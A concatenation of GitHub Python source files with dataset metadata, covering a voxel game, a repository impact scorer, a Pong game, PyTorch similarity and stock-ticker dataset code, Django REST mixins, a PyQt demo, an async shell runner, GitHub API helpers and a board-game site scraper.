texture= arm_texture,
scale = 0.2,
rotation = Vec3(150,-10,0), #creating hand in 3d spam
position= Vec2(0.4,-0.6)
)
def active(self):
self.position = Vec2(0.3,-0.5) #methods that influence the postion of the hand
def passive(self):
self.positiom = Vec2(0.4,-0.6)
def input(key):
if key == "q":
quit()
for z in range(32): # loop for field parameters in the z direction
for x in range(32): #loop for field parameters in the x direction
voxel= Voxel(position=(x,0,z))
player=FirstPersonController() #allows us to move in game
sky= Sky()
hand= Hand()
app.run() | Heroic234/my_mini_minecraft | Mini_craft_code.py | Mini_craft_code.py | py | 3,203 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "ursina.prefabs.first_person_controller.FirstPersonController",
"line_number": 90,
"usage_type": "call"
}
] |
17635193634 | from ..scrabTask import ReportTask
from utils import containedStructure
from datetime import datetime, timezone
from math import log2, pow
from dateutil import parser
name = "ImpactCalculator"
version = "1.1.1"
class ImpactData():
"""
Helper class that stores all information about a single project that is
needed to calculate the impact
:param project_report: The project report
:param language_weights: The language weights
"""
def __init__(self, project_report, language_weights):
self.__project_report = project_report
self.__language_weights = language_weights
self.authors = None
self.contributors = None
self.language_weight = None
self.last_change_age = None
self.project_age = None
self.__gather_autor_contrib()
self.__gather_project_dates()
self.__gather_language_weight()
def __gather_autor_contrib(self):
"""
The function gathers the author and contributor amounts that are needed
to calculate the impact of the project
"""
report = None
if 'AuthorContributorCounter' in self.__project_report:
report = self.__project_report['AuthorContributorCounter']
else:
return
if 'author#' in report and 'contributor#' in report:
self.authors = report['author#']
self.contributors = report['contributor#']
def __gather_project_dates(self):
"""
The function gathers the first and last change dates that are needed to
calculate the impact of the project
"""
report = None
if 'ProjectDates' in self.__project_report:
report = self.__project_report['ProjectDates']
else:
return
if 'first_change' in report and 'last_change' in report:
self.project_age = (
datetime.now(timezone.utc)
- parser.parse(report['first_change'])
).days
self.last_change_age = (
datetime.now(timezone.utc)
- parser.parse(report['last_change'])
).days
def __gather_language_weight(self):
"""
The function gathers the language that is needed to calculate the impact
of the project. The function prefers the git hub information and will
fall back to our own results generated by a more primitive algorithm
"""
report = None
if 'LanguageDetector' in self.__project_report:
report = self.__project_report['LanguageDetector']
if 'MetaDataCollector' in self.__project_report:
if 'main_language' in self.__project_report['MetaDataCollector']:
report = self.__project_report['MetaDataCollector']
if not report:
return
if ('main_language' in report and report[
'main_language'] in self.__language_weights):
self.language_weight = self.__language_weights[
report['main_language']]
def usable(self):
"""
Checks weather all information is available to calculate the impact for
the given project
:returns: True if all necessary information is present False otherwise
"""
return (self.authors is not None
and self.contributors is not None
and self.language_weight is not None
and self.last_change_age is not None
and self.project_age is not None)
class ImpactCalculator(ReportTask):
"""
Class to calculate the impact for a single project
Example:
impact: 45.13200916761271
:param parameter: Parameter given explicitly for this task, for all
projects, defined in the task.yaml
:param global_args: Arguments that will be passed to all tasks. They
_might_ contain something that is useful for the task,
but the task has to check if it is _there_ as these
are user provided. If they are needed to work that
check should happen in the argHandler.
"""
def __init__(self, parameter, global_args):
super(ImpactCalculator, self).__init__(name, version, parameter,
global_args)
self.__authors_weight = 1
self.__contributors_weight = .1
self.__last_change_age_weight = 1
self.__project_age_weight = 1
# FIXME think of real weights or generate them
self.__language_weights = {
'C++': 1,
'C': 1,
'Rust': 1,
'Ruby': 1,
'Java': 1,
'Go': 1,
'PHP': 1,
'JavaScript': 1,
'Objective-C': 1,
'Swift': 1,
'C#': 1,
'Python': 1
}
self.__overwrite_weights()
def __overwrite_weights(self):
"""
Checks and overwrites the default weights with the ones provided in the
tasks.yaml file
"""
if 'authors_weight' in self._parameter:
self.__authors_weight = self._parameter['authors_weight']
if 'contributors_weight' in self._parameter:
self.__contributors_weight = self._parameter['contributors_weight']
if 'last_change_age_weight' in self._parameter:
self.__last_change_age_weight = self._parameter[
'last_change_age_weight']
if 'project_age_weight' in self._parameter:
self.__project_age_weight = self._parameter['project_age_weight']
if 'language_weights' in self._parameter:
self.__language_weights = {
**self.__language_weights,
**self._parameter['language_weights']
}
def calculate_impact(self, data):
"""
Calculates the impact for the given project data
:returns: The impact of the project, NaN is case not all required
information is available in the given project report
"""
if not data.usable():
return None
if data.last_change_age < 90:
data.last_change_age = 90
return data.language_weight * (
(10 - pow(2, log2(10)
- self.__contributors_weight * data.contributors))
+ (10 - pow(2, log2(10)
- self.__authors_weight * data.authors))
+ self.__last_change_age_weight * (
10 / pow(2, ((data.last_change_age / 90) - 1)))
+ (10 - pow(2, log2(10)
- self.__project_age_weight * data.project_age
/ 365))
)
def scrab(self, report):
"""
The scrab task calculates for all projects in the report the impact.
:param report: The report to analyse _and_ change
:returns: Report that contains all scrabbed information
Example:
impact: 45.13200916761271
"""
try:
for project in report['projects']:
impact_data = ImpactData(report['projects'][project],
self.__language_weights)
impact = self.calculate_impact(impact_data)
if impact:
report['projects'][project]['impact'] = float(
"{0:.2f}".format(impact))
elif not containedStructure(
{'projects': {project: {'impact': 0}}}, report):
report['projects'][project]['impact'] = None
except Exception as e:
raise Exception(
"While calculating the impact for the project '{}' with "
"the report\n{}".format(
project,
self.__projects[project])
) from e
return report
| Eyenseo/gitScrabber | gitScrabber/scrabTasks/report/impactCalculator.py | impactCalculator.py | py | 8,015 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "datetime.datetime.now",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 66,
"usage_type": "name"
},
{
"api_name": "datetime.timezone.utc",
"line_number": 66,
"usage_type": "attribute"
},
{
"api_name": "da... |
74768151392 | import pygame
import random
import math
from constants import *
class Paddle:
""" Base class for a paddle """
def __init__(self, x_pos, width, height, speed, color):
self.rect = pygame.Rect((x_pos, (SCREEN_HEIGHT - height) / 2), (width, height))
self.color = color
self.speed = speed
self.velocity = pygame.math.Vector2(0, 1)
self.score = 0
def update(self, delta):
pass
def render(self, screen):
pygame.draw.rect(screen, self.color, self.rect)
class Player(Paddle):
def __init__(self, x_pos, width, height, color):
super().__init__(x_pos, width, height, 500, color)
def update(self, delta):
keys = pygame.key.get_pressed()
if keys[pygame.K_DOWN] or keys[pygame.K_s]:
self.rect.move_ip(self.velocity * self.speed * delta)
elif keys[pygame.K_UP] or keys[pygame.K_w]:
self.rect.move_ip(-self.velocity * self.speed * delta)
# Clamp the y value between 0 and the window's width
self.rect.y = max(0, min(self.rect.y, SCREEN_HEIGHT - self.rect.height))
def update_score(self, font):
self.score += 1
self.text_score = font.render(str(self.score), True, (255, 0, 0))
class Enemy(Paddle):
def __init__(self, x_pos, width, height, color):
super().__init__(x_pos, width, height, 500, color)
# Where the paddle has to move in the y axis
self.predicted_y = (SCREEN_HEIGHT - height) / 2
# The place where the ball collides with the paddle
self.hit_location = 0
def update(self, delta):
if self.predicted_y - self.hit_location < self.rect.y:
self.rect.move_ip(-self.velocity * self.speed * delta)
if self.predicted_y - self.hit_location > self.rect.y:
self.rect.move_ip(self.velocity * self.speed * delta)
def calculate_next_position(self, ball):
vx, vy = ball.velocity
cx, cy = ball.rect.topright
collision_x = 0
while collision_x < self.rect.x:
target_y = 0 if vy < 0 else SCREEN_HEIGHT - ball.radius * 2
collision_x = cx + vx * (target_y - cy) / vy
cx, cy = collision_x, target_y
vy *= -1
self.predicted_y = cy - vy * (self.rect.x - cx) / vx
self.hit_location = random.randint(10, self.rect.height - 10)
class Ball:
def __init__(self, radius, speed):
appear_y = random.randint(SCREEN_HEIGHT / 4, SCREEN_HEIGHT * 3 / 4)
self.rect = pygame.Rect(SCREEN_WIDTH / 2 - radius, appear_y - radius,
radius * 2, radius * 2)
self.position = pygame.math.Vector2(SCREEN_WIDTH / 2 - radius, SCREEN_HEIGHT / 2 - radius)
self.radius = radius
self.speed = speed
# Calculate velocity's angle
angle = random.uniform(-math.pi / 4, math.pi / 4)
# print(angle * 180 / math.pi)
#angle = math.radians(35)#math.pi / 4
self.velocity = pygame.math.Vector2(math.cos(angle) * -1, -math.sin(angle))
def update(self, delta):
self.position += self.velocity * self.speed * delta
self.update_position()
if self.rect.y < 0:
self.rect.y = 0
self.velocity.y *= -1
elif self.rect.y > SCREEN_HEIGHT - self.radius * 2:
self.rect.y = SCREEN_HEIGHT - self.radius * 2
self.velocity.y *= -1
def render(self, screen):
pygame.draw.rect(screen, BALL_COLOR, self.rect)
""" Prepares the ball for a new match """
def reset(self, direction=-1):
# Put the ball in the middle
self.position.x = SCREEN_WIDTH / 2 - self.radius
self.position.y = random.randint(SCREEN_HEIGHT / 4, SCREEN_HEIGHT * 3 / 4) - self.radius
self.update_position()
# Set the angle
angle = random.uniform(-math.pi / 4, math.pi / 4)
self.velocity.x = math.cos(angle) * direction
self.velocity.y = -math.sin(angle)
""" Changes the velocity angle depending on the part hitted by the ball """
def change_angle(self, hit_position, height):
angle = math.pi / 2 * hit_position / height - math.pi / 4
self.velocity.x = math.cos(angle)
self.velocity.y = math.sin(angle)
if self.velocity.y == 0:
self.velocity.y = math.sin(angle + 0.02)
def update_position(self):
self.rect.x = self.position.x
self.rect.y = self.position.y
| delhoyo31415/Pygame-Ping-Pong | entities.py | entities.py | py | 4,472 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pygame.Rect",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pygame.math.Vector2",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pygame.math",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "pygame.draw.rect",
... |
70975829473 |
import torch
def cosine_metric(novels, bases):
"""
Args:
novel (tensor): [dim] -> [batch_size,dim]
bases (tensro): [batch_size,dim]
Returns:
"""
# batch_size = bases.shape[0]
# novels = novel.unsqueeze(0).expand(batch_size, -1)
n = novels.shape[0] # [25]=[5-way,5-shot]
m = bases.shape[1] # [5]=[5-way,1-shot]
novels = novels.unsqueeze(1).expand(n, m, -1) # [25,5,1600]
bases = bases.transpose(1,0)
bases = bases.unsqueeze(0).expand(n, m, -1) # [25,5,1600]
assert novels.size() == bases.size()
cos = torch.nn.CosineSimilarity(dim=-1, eps=1e-6)
sim_score = cos(bases, novels)
# print(sim_score.shape)
return sim_score
def euclidean_dis(a, b):
n = a.shape[0] # [25]=[5-way,5-shot]
m = b.shape[0] # [5]=[5-way,1-shot]
a = a.unsqueeze(1).expand(n, m, -1) # [25,5,1600]
b = b.unsqueeze(0).expand(n, m, -1) # [25,5,1600]
# dis = torch.pow(a - b, 2).sum(dim=2).clamp(min=1e-12).sqrt()
dis = torch.pow(a - b, 2).sum(dim=2).sqrt()
return dis
def euclidean_metric(a, b): # 欧式距离度量[query,support]
"""
:param a:[query_shot*way,D]=[Q*5,1600]
:param b:[way,D]=[5,1600]
:return:[Q*N,way]=[50,5]
"""
n = a.shape[0] # [25]=[5-way,5-shot]
m = b.shape[1] # [5]=[5-way,1-shot]
a = a.unsqueeze(1).expand(n, m, -1) # [25,5,1600]
b = b.transpose(1,0)
b = b.unsqueeze(0).expand(n, m, -1) # [25,5,1600]
print(a.shape, b.shape)
logits = -((a - b) ** 2).sum(dim=2) # [Q*N,way]->[25,5] query的25张图,每张图用一个5维向量表示标签信息,sum(dim=1600)
# 这里距离用于计算acc和loss,所以不用开方也能比较大小.要计算softmax,而距离越大越不相似因此取反
return logits # [25,5]->25张query图像,分别与5张support的距离,取距离负数,取最大的下标,即为预测的类别 | ChunpingQiu/SSL-Features-for-RS-Scene-Classification-Few-Samples | util/similarity.py | similarity.py | py | 1,971 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "torch.nn.CosineSimilarity",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "torch.pow",
"line_number": 34,
"usage_type": "call"
}
] |
70071534753 | from core import services
from django.http import HttpResponse
from openpyxl.writer.excel import save_virtual_workbook
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
class DetailedListViewSetMixin(viewsets.ModelViewSet):
serializer_action_classes = {}
ordering = ('id',)
def get_serializer_class(self):
"""
A class which inhertis this mixins should have variable
`serializer_action_classes`.
Look for serializer class in self.serializer_action_classes, which
should be a dict mapping action name (key) to serializer class (value),
i.e.:
class SampleViewSet(viewsets.ViewSet):
serializer_class = DocumentSerializer
serializer_action_classes = {
'upload': UploadDocumentSerializer,
'download': DownloadDocumentSerializer,
}
@action
def upload:
...
If there's no entry for that action then just fallback to the regular
get_serializer_class lookup: self.serializer_class, DefaultSerializer.
"""
try:
return self.serializer_action_classes[self.action]
except (KeyError, AttributeError):
return super().get_serializer_class()
@action(detail=False, methods=['get'])
def detailed_list(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
kwargs.update({'many': True, 'context': {'request': self.request}})
if page is not None:
serializer = self.get_serializer_class()(page, **kwargs)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer_class()(queryset, **kwargs)
return Response(serializer.data)
@action(detail=True, methods=['get'])
def detailed(self, request, *args, **kwargs):
instance = self.get_object()
kwargs.pop('pk')
kwargs.update({'context': {'request': self.request}})
serializer = self.get_serializer_class()(instance, **kwargs)
return Response(serializer.data)
class ExportViewSetMixin(viewsets.ModelViewSet):
@action(detail=False, methods=["get"])
def export(self, request, *args, **kwargs):
excel_type = request.GET.get('excel_type', 'csv')
qs = self.filter_queryset(self.get_queryset())
serializer_class = self.get_serializer_class()
service = services.ExcelExportService(
queryset=qs, serializer_class=serializer_class,
)
if excel_type == 'xlsx':
wb = service.create_workbook()
filename = service.generate_file_name('xlsx')
response = HttpResponse(
save_virtual_workbook(wb), content_type="application/vnd.ms-excel"
)
response["Content-Disposition"] = f'attachment; filename="{filename}"'
else: # csv
response = service.create_csv(True)
return response
| berkaymizrak/Immfly-Media-Platform-Project | core/mixins.py | mixins.py | py | 3,096 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "rest_framework.viewsets.ModelViewSet",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.viewsets",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "rest_framework.response.Response",
"line_number": 48,
"usage_type": "call... |
27051971804 | from dtat.api.guild import guildprint
from dtat.services.list import guildWithId
from dtat.services.update import guildObj
from flask import jsonify
from dtat.models import Player
from dtat.services.remove import removeGuild
from dtat.exceptions import DTATException
@guildprint.route('/id/<int:id>/data', methods=['GET'])
def data(id):
"""
Returns guild data.
:param id: guild_id
"""
guild = guildWithId(id)
if len(guild.players) == 0:
try:
guild = guildObj(guild, True, True)['guild']
except DTATException as e:
if e.invalid == ["Invalid guild id"]:
removeGuild(guild)
raise DTATException(410, "Guild has been deleted.", ["guild"])
else:
raise DTATException(e.errorCode, e.message, e.invalid)
data = []
for a in guild.players:
data.append(a.list())
return jsonify({
'id': guild.id,
'name': guild.name,
'level': guild.level,
'players': {
'keys': Player.keys(),
'data': data
}
})
| deeptownadmintools/main-server | dtat/api/guild/data.py | data.py | py | 1,139 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "dtat.services.list.guildWithId",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "dtat.services.update.guildObj",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "dtat.exceptions.DTATException",
"line_number": 20,
"usage_type": "name"
},... |
38326493487 | import torch
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
import glob
from pathlib import Path
import os
class TickerDataset(Dataset):
def __init__(self, root_dir, series_length, lookback, min_sequence_length, template='*.csv', transform=None,
start_date=None, end_date=None, fixed_start_date=False, datetime_format='%Y-%m-%d',
normalised_returns=False, max_n_files=None):
self.series_length = series_length
self.lookback = lookback
self.transform = transform
self.start_date = start_date
self.end_date = end_date
self.datetime_format = datetime_format
self.fixed_start_date = fixed_start_date
self.normalised_returns = normalised_returns
# Only keep tickers with length less than a minimum.
ticker_files = glob.glob(str(Path(root_dir) / template))
if max_n_files:
ticker_files = ticker_files[:max_n_files]
self.ticker_files = []
print(f'Finding tickers with sufficient length, from {len(ticker_files)} files.')
for ticker_file in ticker_files:
if 0:
if os.path.basename(ticker_file) != 'MS_prices.csv':
continue
df = read_csv(ticker_file, self.datetime_format)
# Identify the indices within the given date range.
if start_date and end_date:
valid_indices = ((df.index >= start_date) & (df.index <= end_date))
elif start_date:
valid_indices = df.index >= start_date
elif end_date:
valid_indices = df.index <= end_date
else:
assert False
if sum(valid_indices) == 0:
# No days in the given date range.
continue
# Get the indicies of the valid days in the date range.
valid_indices = np.where(valid_indices)[0]
if valid_indices[0] < lookback:
# Not enough days before the start date to compute returns.
continue
if len(valid_indices) < series_length:
# Not enough days between the start and end date.
continue
self.ticker_files.append(ticker_file)
continue
# start_date_index = np.
# Get the index of the start date.
start_date_row = df.index.get_loc(self.start_date)
if self.start_date:
df = df.loc[self.start_date:]
if self.end_date:
df = df.loc[:self.end_date]
if df.shape[0] >= min_sequence_length:
self.ticker_files.append(ticker_file)
print(f'Found {len(self.ticker_files)} files.')
def __len__(self):
return len(self.ticker_files)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
filename = self.ticker_files[idx]
df = read_csv(filename, self.datetime_format)
# Calculate a rolling z-score.
df['returns'] = df['close'].pct_change()
if self.normalised_returns:
# Normalised returns.
df['returns'] = (df['returns'] - df['returns'].rolling(self.lookback).mean()) / df['returns'].rolling(self.lookback).std()
if 0:
# Return close prices.
df['returns'] = df['close']
df = df.dropna()
# Filter dates *after* calculating returns, so previous dates can be used in the lookback.
if self.start_date:
df = df.loc[self.start_date:]
if self.end_date:
df = df.loc[:self.end_date]
returns = np.array(df['returns'])
if self.fixed_start_date:
# Get a series at the start date.
start = 0
else:
# Get a random sub-series.
start = np.random.randint(0, returns.shape[0] - self.series_length)
series = returns[start: start + self.series_length]
# Add extra feature dimension.
series = series[..., np.newaxis]
# Convert to torch tensor.
series = torch.from_numpy(series)
dates = df.index.values[start: start + self.series_length]
dates = [str(d) for d in dates]
sample = {
'series': series,
'filename': filename,
'dates': dates,
}
return sample
def read_csv(filename, datetime_format):
df = pd.read_csv(filename)
df['date'] = pd.to_datetime(df['date'], format=datetime_format)
df.set_index('date', inplace=True)
return df
def create_ticker_dataset(root_dir, series_length, lookback, min_sequence_length,
start_date=None, end_date=None, fixed_start_date=False,
normalised_returns=False, max_n_files=None):
dataset = TickerDataset(root_dir, series_length, lookback, min_sequence_length,
start_date=start_date, end_date=end_date, fixed_start_date=fixed_start_date,
normalised_returns=normalised_returns, max_n_files=max_n_files)
return dataset
def test_ticker_dataset():
root_dir = r'D:\projects\trading\mlbootcamp\tickers'
series_length = 200
lookback = 200
min_sequence_length = 2 * (series_length + lookback)
max_n_files = 100
dataset = create_ticker_dataset(root_dir, series_length, lookback, min_sequence_length, max_n_files=max_n_files)
dataloader = DataLoader(dataset, batch_size=4, shuffle=True, num_workers=0)
for b, batch in enumerate(dataloader):
series = batch['series']
filename = batch['filename']
dates = batch['dates']
print(b, series.shape, filename, dates)
def main():
df = pd.read_csv(r'D:\projects\trading\mlbootcamp\tickers\AAPL_prices.csv')
# Calculate a rolling z-score.
lookback = 200
df['returns'] = df['close'].pct_change()
df['returns'] = (df['returns'] - df['returns'].rolling(lookback).mean()) / df['returns'].rolling(lookback).std()
fig, axes = plt.subplots(1, 1, squeeze=False)
ax = axes[0, 0]
# ax.plot(df['date'], df['close'])
# df['close'].plot()
df['returns'].plot()
# df['mean'].plot()
plt.show()
print(df.info())
if __name__ == '__main__':
test_ticker_dataset()
# main()
| pwmorrison/trading | mlbootcamp/vae/dataset.py | dataset.py | py | 6,419 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "glob.glob",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "os.path.basename",
... |
6345239505 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/3/3 16:31
# @Author : Vincent.G.Woo
# @Site :
# @File : blogtest2.py
# @Software: PyCharm Community Edition
# @Python_Version:
# @Software_Version:
import sys
from blog import Ui_MainWindow
from PyQt5 import QtWidgets
class mywindow(QtWidgets.QWidget, Ui_MainWindow):
global mStr
def __init__(self):
super(mywindow, self).__init__()
self.setupUi(self)
self.pushButton_3.clicked.connect(self.addText)
def getText(self):
global mStr
mStr = self.textEdit.toHtml()
def setText(self):
global mStr
self.textBrowser.append(mStr)
def addText(self):
self.getText()
self.setText()
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
myshow = mywindow()
myshow.show()
sys.exit(app.exec_())
| Vingent/HydrologySoftware_Code | blogtest2.py | blogtest2.py | py | 923 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "PyQt5.QtWidgets.QWidget",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "PyQt5.QtWidgets",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "blog.Ui_MainWindow",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "PyQt5... |
72506183395 | import asyncio
import os
from .utils import *
from .exceptions import *
# --------------------------------------------------------------------
class Shell:
limiter = asyncio.BoundedSemaphore(CPU_CORES)
def __init__(self, config=None):
self.log = get_logger("bakery.shell.Shell")
self.env = {}
def derive(self):
derived_shell = Shell()
derived_Shell.env.update(self.env)
return derived_shell
async def __call__(
self,
*args,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
name=None,
log=None,
**kwargs
):
# Limit concurrency in shell calls to the number of cores on the system, so that we
# do not end up spawning more jobs from coroutines than the system has processors.
await Shell.limiter.acquire()
try:
if name is None:
name = "#"
if log is None:
log = JobLog(self.log, name=name)
cmd_line = compose(
lambda x: flat_map(x, degenerate), lambda x: flat_map(x, str)
)(args)
log.trace(" ".join(cmd_line))
output = []
err_output = []
env = os.environ.copy()
env.update(self.env)
proc = await asyncio.create_subprocess_exec(
*cmd_line, stdout=stdout, stderr=stderr, env=env, **kwargs
)
readline_tasks = {
asyncio.Task(proc.stdout.readline()): (
output,
proc.stdout,
lambda x: log.print(x),
),
asyncio.Task(proc.stderr.readline()): (
err_output,
proc.stderr,
lambda x: log.error(x),
),
}
while readline_tasks:
done, pending = await asyncio.wait(
readline_tasks, return_when=asyncio.FIRST_COMPLETED
)
for future in done:
buf, stream, display = readline_tasks.pop(future)
line = future.result()
if line: # if not EOF
line = line.decode("utf-8").strip()
buf.append(line)
display(line)
readline_tasks[asyncio.Task(stream.readline())] = (
buf,
stream,
display,
)
await proc.wait()
if proc.returncode != 0:
raise SubprocessError(cmd_line, output, err_output, proc.returncode)
else:
return output
finally:
Shell.limiter.release()
| lainproliant/bakery | bakery/shell.py | shell.py | py | 2,831 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "asyncio.BoundedSemaphore",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "asyncio.subprocess",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "asyncio.subprocess",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name"... |
17028867718 | # helper functions
import time
import datetime
import requests
import pickle
import sys
import itertools
import glob
# add things to this list that need to be closed when the program ends
things_to_close = []
# load the github api tokens into an itertools.cycle
github_tokens = []
for file_str in glob.glob("github_token*.txt"):
with open(file_str) as token_file:
github_tokens.append(token_file.read().strip())
token_cycle = itertools.cycle(github_tokens)
def get_raw_url(item):
return item["html_url"].replace(
"https://github.com/",
"https://raw.githubusercontent.com/"
).replace(
"/blob/",
"/"
)
def get_repo(url: str):
split_url = url.split("/")
user = split_url[3]
repo = split_url[4]
return "{}/{}".format(user, repo)
def get_filename(url: str):
return url.split("/")[-1]
def check_rate_limit(headers: dict):
if "X-RateLimit-Remaining" not in headers or "X-RateLimit-Reset" not in headers:
print("Rate limit info was not in the api response headers")
return
count_remaining = headers["X-RateLimit-Remaining"]
reset_time = headers["X-RateLimit-Reset"]
if count_remaining == "0":
reset_time = datetime.datetime.fromtimestamp(float(reset_time))
time_to_wait = reset_time - datetime.datetime.now()
if time_to_wait.seconds <= 0:
return
elif time_to_wait.seconds >= 180:
print("Time to wait was more than 180 seconds. Only sleeping: 180")
time.sleep(180)
else:
print("Rate Limit Hit, Sleeping: {}".format(time_to_wait.seconds + 1))
time.sleep(time_to_wait.seconds + 1)
def check_abuse_limit(api_response: requests.Response):
if "Retry-After" not in api_response.headers:
log_error_and_exit("api response returned status code: 403 and 'Retry-After' is not in the headers", api_response)
time_to_wait = int(api_response.headers["Retry-After"]) + 1
print("Abuse rate limit hit, Sleeping: {}".format(time_to_wait))
time.sleep(time_to_wait)
def log_error_and_exit(message: str, api_response: requests.Response):
print(message)
with open("api_response.pickle", "wb") as api_res_file:
pickle.dump(api_response, api_res_file)
cleanup_and_exit()
def cleanup_and_exit():
for item in things_to_close:
item.close()
sys.exit()
| millsjustin/gitSecrets | utils.py | utils.py | py | 2,403 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "glob.glob",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "itertools.cycle",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.fromtimestamp",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "datetime.da... |
19012266500 | from email.quoprimime import quote
import pandas as pd
import requests
from bs4 import BeautifulSoup
from time import sleep
import csv
def request(msg, slp=1):
'''A wrapper to make robust https requests.'''
status_code = 500 # Want to get a status-code of 200
while status_code != 200:
sleep(slp) # Don't ping the server too often
try:
r = requests.get(msg)
status_code = r.status_code
if status_code != 200:
print("Server Error! Response Code %i. Retrying..." % (r.status_code))
except:
print("An exception has occurred, probably a momentory loss of connection. Waiting one seconds...")
sleep(10)
return r
def getDadosJogo(linkJogo,idJogo):
#urlBusca = 'https://www.ludopedia.com.br/jogo/'
#nomeJogoBusca = str(nomeJogo).replace(' ','-')
#urlBuscaPagina = urlBusca+nomeJogoBusca
urlBuscaPagina = linkJogo
r = request(urlBuscaPagina)
columnsDF=["id",
"jogoAno",
"jogoIdade",
"jogoTempJogo",
"jogoQtJogadores",
"jogoMiolosDesigner",
"jogoMiolosArtista",
"jogoMiolosEditora",
"jogoStatTem",
"jogoStatQuer",
"jogoStatTeve",
"jogoStatFavorito",
"jogoResumoTexto"]
#dfJogo = pd.DataFrame(columns=columnsDF,index=range(1))
soup = BeautifulSoup(r.text, 'lxml')
detalhes = soup.find_all("div", attrs={'class':'jogo-top-main'})
jogoAnoFull = detalhes[0].find_all("span", attrs={'class':'text-xs'})
jogoAno = jogoAnoFull[0].string.replace('(','').replace(')','')
jogoDetalhesFull = detalhes[0].find_all("ul", attrs={'class':'list-inline'})
jogoDetalhesLista = jogoDetalhesFull[0].find_all("li")
jogoIdade = jogoDetalhesLista[0].text
jogoTempJogo = jogoDetalhesLista[1].text
jogoQtJogadores = jogoDetalhesLista[2].text
jogoMiolos = detalhes[0].find_all("span", attrs={'class':'info-span text-sm'})
jogoMiolosDesigner = jogoMiolos[0].find_next("a").text
jogoMiolosArtista = jogoMiolos[1].find_next("a").text
jogoMiolosEditora = jogoMiolos[2].find_next("a").text
jogoStatsPossuem = detalhes[0].find_all("button")
for jogoStat in jogoStatsPossuem:
if jogoStat.attrs.get("data-tipo") == "fl_tem":
sTemp = jogoStat.string
jogoStatTem = sTemp[sTemp.find('(')+1:sTemp.find(')')]
if jogoStat.attrs.get("data-tipo") == "fl_quer":
sTemp = jogoStat.string
jogoStatQuer = sTemp[sTemp.find('(')+1:sTemp.find(')')]
if jogoStat.attrs.get("data-tipo") == "fl_teve":
sTemp = jogoStat.string
jogoStatTeve = sTemp[sTemp.find('(')+1:sTemp.find(')')]
if jogoStat.attrs.get("data-tipo") == "fl_favorito":
sTemp = jogoStat.string
jogoStatFavorito = sTemp[sTemp.find('(')+1:sTemp.find(')')]
jogoResumo = soup.find_all("div", attrs={'class':'bloco-sm-content bloco-sm-content-open'})
jogoResumoTexto = jogoResumo[0].text.replace("\n","").replace("\t",'').replace("\r",'')
tempDataframe = pd.DataFrame([[idJogo,
jogoAno,
jogoIdade,
jogoTempJogo,
jogoQtJogadores,
jogoMiolosDesigner,
jogoMiolosArtista,
jogoMiolosEditora,
jogoStatTem,
jogoStatQuer,
jogoStatTeve,
jogoStatFavorito,
jogoResumoTexto]],columns=columnsDF)
#dfJogo.iloc[1, :] = tempDataframe
print(tempDataframe)
return tempDataframe
def geraDetalheJogos():
#----------------- lendo os jogos baixados
file = '003_storage/000_transient/ludopedia_listaJogos.csv'
csvDetalheJogos = '003_storage/000_transient/ludopedia_DetalhesJogos.csv'
df = pd.read_csv(file,sep=';',quoting=csv.QUOTE_NONNUMERIC)
linkJogo = df['url']
print('DF size :'+str(df.size))
print('DF shape :'+str(df.shape))
dfJogoAll = pd.DataFrame(columns=["id",
"jogoAno",
"jogoIdade",
"jogoTempJogo",
"jogoQtJogadores",
"jogoMiolosDesigner",
"jogoMiolosArtista",
"jogoMiolosEditora",
"jogoStatTem",
"jogoStatQuer",
"jogoStatTeve",
"jogoStatFavorito",
"jogoResumoTexto"])
#for idJogo in idsJogos:
for i in range(len(df)):
dfJogo = getDadosJogo(linkJogo[i],i+1)
dfJogoAll = pd.concat([dfJogoAll,dfJogo],axis=0)
if i == 0:
#criando o arquivo inicial
# com o header
dfJogo.to_csv(csvDetalheJogos, sep=';',quoting=csv.QUOTE_NONNUMERIC)
else:
dfJogo.to_csv(csvDetalheJogos,mode='a', header=False, sep=';',quoting=csv.QUOTE_NONNUMERIC)
#geraDetalheJogos() | lucasccpp/bgwebscrapping | 001_scrapping/ludopediaDetalhes.py | ludopediaDetalhes.py | py | 5,321 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "time.sleep",
"line_number": 12,
"usage_type": "call"
},
{
